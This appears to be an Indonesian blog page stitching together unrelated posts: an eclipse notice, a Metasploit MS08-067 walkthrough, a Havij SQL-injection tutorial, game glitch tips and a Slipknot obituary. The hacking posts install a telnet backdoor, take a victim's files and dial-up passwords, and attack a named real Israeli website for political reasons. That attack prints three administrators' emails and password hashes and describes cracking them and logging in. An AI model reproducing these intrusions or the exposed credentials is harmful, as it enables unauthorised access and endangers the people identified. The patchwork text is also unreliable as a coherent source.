Badan Meteorologi Klimatologi dan Geofisika (BMKG) memperkirakan gerhana matahari cincin (GMC) akan terjadi pada 9-10 Mei 2013.

Berdasarkan situs resmi BMKG yang dilansir di Jakarta, Jumat, menyebutkan gerhana matahari cincin tersebut dapat diamati dari Samudra Pasifik, Australia, Singapura, Indonesia kecuali Sumatera bagian Utara dan Filipina bagian Selatan.

Di Australia dan Pasifik akan mengalami gerhana matahari cincin. Sementara di Indonesia kecuali Sumatera bagian Utara, akan berupa gerhana matahari sebagian (GMS) pada 10 Mei 2013 yang dapat disaksikan pada pagi hari.

Fase GMC, di mana gerhana mulai pada 21 25.1 UT, gerhana cincin mulai di 23 32.6 UT, dan puncaknya pada 00 19.6 UT, gerhana cincin berakhir 02 17.8 UT serta gerhana berakhir pada 03 25.3 UT.

Namun, waktu untuk setiap fase di setiap lokasi bisa berbeda dengan waktu-waktu tersebut, karena tergantung pada posisi lokasi pengamat di permukaan bumi dan posisi bulan dan matahari nisbi terhadap posisi pengamat.

Gerhana mulai dapat terlihat di Kupang, Manado, Ternate, Ambon, Sorong, Manokwari, Merauke dan Jayapura. Selain Kupang dan Manado, masyarakat di enam daerah lainnya beruntung bisa menyaksikan puncak gerhana hingga gerhana berakhir.

Sementara puncak gerhana juga bisa dilihat masyarakat di Surabaya, Pontianak, Palangka Raya, Banjarmasin, Samarinda, Denpasar, Mataram, Kupang, Manado, Kendari, Palu, Makassar.

Sedangkan gerhana berakhir bisa dilihat dari Padang, Pekanbaru, Jambi, Bengkulu, Palembang, Bandar Lampung, Jakarta, Bandung, Semarang, Yogyakarta, Surabaya, Pontianak, Palangka Raya, Banjarmasin, Samarinda, Denpasar, Mataram, Kupang, Manado, Kendari, Palu, Makassar.

Gerhana matahari adalah fenomena alam di mana terhalanginya cahaya matahari oleh bulan, sehingga tidak semuanya sampai ke bumi.

Peristiwa tersebut terjadi akibat dinamisnya pergerakan posisi matahari, bumi dan bulan dan hanya terjadi pada saat fase bulan baru dan dapat diprediksi sebelumnya. 

Disini kita akan membahas bagaimana melakukan hacking menggunakan Metasploit Framework yang ditambah dengan pemanfaatan program luar untuk mengambil informasi-informasi yang kita inginkan.

Sebagai contoh penulis akan melakukan hacking dengan memanfaatkan celah keamanan pada Server Service Could Allow Remote Code Execution – MS08-067 di Windows XP SP3. Sebenarnya penulis pernah mengisi seminar dan demo dengan materi memanfaatkan celah keamanan tersebut untuk melakukan hacking Windows XP SP2/SP3 pada bulan awal Desember 2008, celah ini sudah diketahui penulis pada ahkir oktober 2008 dari suatu situs keamanan, di sini saya share sekaligus sampai penggunaan meterpreter hingga memanfaatkan program luar untuk exploitasi password dial up.

Ok kita mulai saja

Pertama-tama untuk mengetahui siapa saja yang terkoneksi di jaringan. maka anda dapat masuk ke command prompt lalu ketikkan perintah net view lalu enter

Setelah muncul komputer-komputer di jaringan maka anda tinggal pilih mana yang akan dijadikan target, contohnya PCXPSP3, ping saja ip PCXSP3.

x

Setelah anda mengetahui komputer server anda bisa saja jika ingin melakukan scan untuk mengetahui OS apa, portnya berapa aja yang terbuka dengan NMAP atau memanfaatkan NMAP dari Metasploit Framework.

Kita langsung saja ke tahap exploitasi. Disini saya menggunakan console.

Di bawah adalah untuk masuk ke komputer target dengan payload shell/bind_tcp :

x

Untuk cara menggunakan payload meterpreter sekaligus coba-coba upload telnet backdoor

x

Setelah di upload maka kita dapat periksa di c:\ di komputer korban lalu jalankan telnet backdoor sebanyak 3x agar berjalan dengan baik.

x

Setelah itu kita dapat menggunakan Putty untuk masuk ke telnet

x

Tampilan setelah masuk lewat telnet backdoor

x

Sekarang kita coba misalkan ingin mendownload file dari komputer korban, misal file fotorahasia.jpg

x

Di bawah ini adalah contoh perintah untuk mendownload file fotorahasia.jpg dengan menggunakan meterpreter.

x

Kita coba sekarang mencoba mengexploitasi untuk mendapatkan password dial up yang disimpan oleh komputer korban, kita upload program untuk mengambil password dial up yang disimpan oleh Windows yaitu dial.exe

x

Setelah di upload kita gunakan perintah : dial /stext (nama file).

x

Setelah menjadi file, di contoh menggunakan nama file pass.txt, tinggal kita buka isi file pass.txt dengan perintah : type pass.txt

x

Binggo, kita mendapatkan password dial up.

Havij Vers 1.10 , sebuah tool yang powerfull untuk mendapatkan akses admin dengan teknik sql injection. untuk informasi dan download tool ini bisa anda temukan di thread dibawah ini (Hey r3dm0v3.. u coded an awesome tool)
CODE: SELECT ALL
http://forum.xcode.or.id/viewtopic.php?f=100&t=39403


Ok saya asumsikan anda sudah download dan install di mesin anda. sekarang mari kita coba salah satu website milik Israel.. (hmmm.... kenapa salah satu website di negara anda dijadikan kelinci disini sangat berkaitan erat dengan agresi militer anda pada kapal relawan dunia untuk Palestina.. saya non muslim tapi arogansi Israel adalah buntut dari tutorial ini).

web target : http://www.xenia.co.il/index.php?page_id=93
seperti biasanya berikan tanda ' pada web tsb:
CODE: SELECT ALL
http://www.xenia.co.il/index.php?page_id='93

hasilnya dapat anda lihat pada gambar dibawah. BUG SQL Injection

Image

Sekarang jalankan tool Havij lalu masukkan link tersebut lalu klik Analize dan tunggu beberapa saat (yang ini ga sampe 1 menit)....

Image
hasilnya:

Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id='93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia

w007s...... I Got the database... sekarang klik Tables lalu klik Get Tables

Image
w007s..... I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1


Nah .. pada tahap ini, anda perlu cari tahu... dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.

Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm... 10 detik aja).

Image
w007ss.... cool.. got to check it out... saya dapatkan kolom sbb

regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name uid
newsletter1


nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm.... saya ceklis aja kolom :

name
email
pass

(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).

lalu klik Get Data dan

Image
Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=àåãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff

w007s.... ternyata website ini memiliki 3 administrator...
hmmmm... passwordnya di HASH alias di-enkripsi..... no problem... havij juga punya md5 hash crack..

Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat.... 30 detik deh). lalu hasilnya

Image
w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ... password berhasil di-crack.. sekarang tinggal cari halaman login.

Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start.... .... ............. Searching

Image
Got that....
Page Found: http://www.xenia.co.il/login.php

Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan....
U gained an Access
Image
UH,,,, bahasanya sama sekali ga bisa dimengerti... :circle:
Minggu, 04 Juli 2010

Cara Bug di Point Blank

Ada yang tau BUG di Point Blank . .??
kalau gag tau, gini caranya...
cara 1=
pake piso pencet lompat+tahan klik kiri+maju+samping+jongkok-bediri...

kalo cara 1 ga bisa coba cara 2
cara 2=
pake piso , lompat-lompat+tahan klik kiri+w+a+s+d+jongkok-bediri asal2 nanti masuk sendiri
liad gambar aja..
hihihi masuknya emang rada susah tapi kalo udah masuk GG
gw kill 40 orang di bomb mission hihihihi


BUG BARU!UPDATED

MAP BREAKDOWN
Quote
di mesin yg kayak di blow city..
ngebugnya caranya sama kek di blow city..
ntar masuk ke bagian depan mesinnya trus
cara masuk ke dalem mesinnya adalah:
pas mesinnya dah mau brubah bentuk karena ditembakin,
kamu pencet maju sambil lompat2..
nanti pas mesinnya brubah bentuk, kamu langsung masuk ke dalem tapi skali masuk gx isa kluar and gx isa gerak..
hahahah..


map crackdown
Quote
Posted Image
caranya:
lari ke bunderannya trus lompat madep ke bawah sambil tabrak..
note:
pertama lu lari ke arah buletannya... lu loncat ampe geter trus lu goyangin mouse lu ke besi2 yg gedenya..


bunderan yg di gunung tempat CT respawn (jongkok jalan muterin) NEW!
credit to alvi.


bug granat
Quote
lempar persis sbelom kluar tulisan blue/red team win, granatnya gx bakal meledak..
begitu next roundnya, "okay let's go" granatnya ada di tempat trakhir km lempar meldak..
hehehe.. lempar ke base musuh mantap..


bug saint mansion:
Quote
jongkok sambil tabrak sudut2 kotak di lantai 2..hehehe
sekedar info.. kalo udah masuk nanti bisa turun ke lantai 1 dan ngebugnya ga di lantai2 tapi di lantai 1..^^


bug Flash Bang sama Poison Smoke
Quote
cobain aja.. ga abis2..wkwkwk.. tapi cuma yg point duank..


list bug yg gw n share:
-outpost manjat tembok..tau kan kalo jd CT itu lho..
-outpost masuk ke cerobong yg miring itu (patched)
-blow city mesin bom site B (patched)
-breakdown mesin kek di blowcity
-breakdown (not shared bahaya)
-crackdown bunderan 1
-crackdown bunderan 2
-outpost heli(ga guna keknya)
-bug naek ke kotak cubeware di outpost..hahah(bukan bug sih ini tapi sejenis lahh..hehehe)
-bug saint mansion(updated)
-bug FB,Smoke Poison Unlimited

list bug yg brb nyari caranya:
- bug stormtube masuk ke kreta kuning??
- bug downtown nembus kaca??
- bug outpost pasang bom di udara??? gw liad screenshotnya.. di bomsite B.. keknya masangnya lewat heli..
- bug downtown pasang bom ga di bombsite??gw ada SSnya (new)

note:
-jangan copy paste masukin blog kalian! nanti di patch woyy!!!! gw liad ada blog yg enak bgt copy paste..wew
oh iya bagi cendollnya dunnn

-share BUG-BUG yg kalian temuin jg dunn..ntar aq merge..

-masi ada bug yg belum gw post karena bugnya ga ada yg tau..alias cm gw dan gw anggep berbahaya..^^

TIPS menemukan bug menurut kesimpulan gw:
- bug itu ada di objek yg ada pada suatu map.(dalam hal ini brati tembok/lantai ga isa..inget ini pengertianku duank..)
- map itu pada dasarnya cuma batas tembok/udara(tidak bisa dilewati/dilompati) dan alasnya datar..
jadi miringan pada lantai,tangga,mobil itu termasuk obyek!
- buat nemuin bug itu ada banyak cara.. coba2 aja..kalo bisa kadang geter2 brati udah mendekati/emg ga bisa..
kalo udah mumet pencet asal2an aja jongkok,lompat,gerak2 kamera kemana2 pencet2 WASD..!
- semua bug yang ada itu ga perlu pake piso..jadi ga usah piso2 brisik!
- SELAMAT ANDA TELAH MENJADI BUG HUNTER!^^

Pembetot bas sekaligus pendiri band metal Slipknot Paul Grey meninggal dunia, Selasa (25/5/2010) pagi. Ia ditemukan dalam kondisi tak bernyawa di sebuah hotel di kawasan TownePlace Suites, 8800 Northpark Drive Amerika Serikat.

artikel dari  haxims.blogspot.com

Basis yang lekat dengan julukan "The Pig" lantaran selalu mengenakan topeng babi setiap beraksi di atas panggung ini meninggal dunia di usianya yang ke-38 seperti dilansir examiner.com, Selasa (25/5/2010).

Belum diketahui pasti penyebab kematian basis yang dikenal ramah kepada para maggots (fans Slipknot-red) ini. Namun sosok Paul dikenal kerap mengkonsumsi narkoba dan alkohol.

Grey terjebak di dunia hitam narkoba sejak tahun 2003, saat mobil yang dibesutnya menabrak pengendara motor di Carpenter Avenue sebagaimana dilansir desmoinesregister.com.

artikel dari  haxims.blogspot.com

Saat ditangkap, Grey kedapatan membawa berbagai obat-obatan terlarang dan juga terlibat pelanggaran lalu lintas. Dalam catatan hukumnya, terdapat surat tulisan tangan dari dr. Joe Takamine, salah satu dokter yang pernah menangani Gray.

"Kecintaannya yang besar terhadap musik, membuatnya bertahan agar tidak kecanduan narkoba," jelasnya.

artikel dari  haxims.blogspot.com

Slipknot, band metal asal Des Moines Iowa telah menelurkan 4 album sejak tahun 1999. Ke empat album itu adalah Slipknot (1999), Iowa (2002), Vol 3 (The Subliminal Verses) (2005) dan terakhir All Hope Is Gone (2008).

artikel dari  haxims.blogspot.com

Debut album Slipknot meraih penghargaan platinum. Selain itu, Slipknot sempat meraih nominasi untuk 7 Grammy awards dan memenangkan penghargaan Best Metal Performance tahun 2006.
Senin, 03 Mei 2010

Metasploit Framework

Metasploit Framework adalah sebuah proyek open source untuk mengembangkan, menguji dan menggunakan kode eksploit. Dibuat dengan bahasa Perl sebagai fondasi dasar dan dan terdiri dari komponen pelengkap yang telah dicompile dengan bahasa C, assembler dan Python. Metasploit Framework dapat berjalan pada sistem operasi UNIX, Linux dan Windows. Keterangan yang lebih detail dapat anda cari di http://www.metasploit.com.

Template by:
Free Blog Templates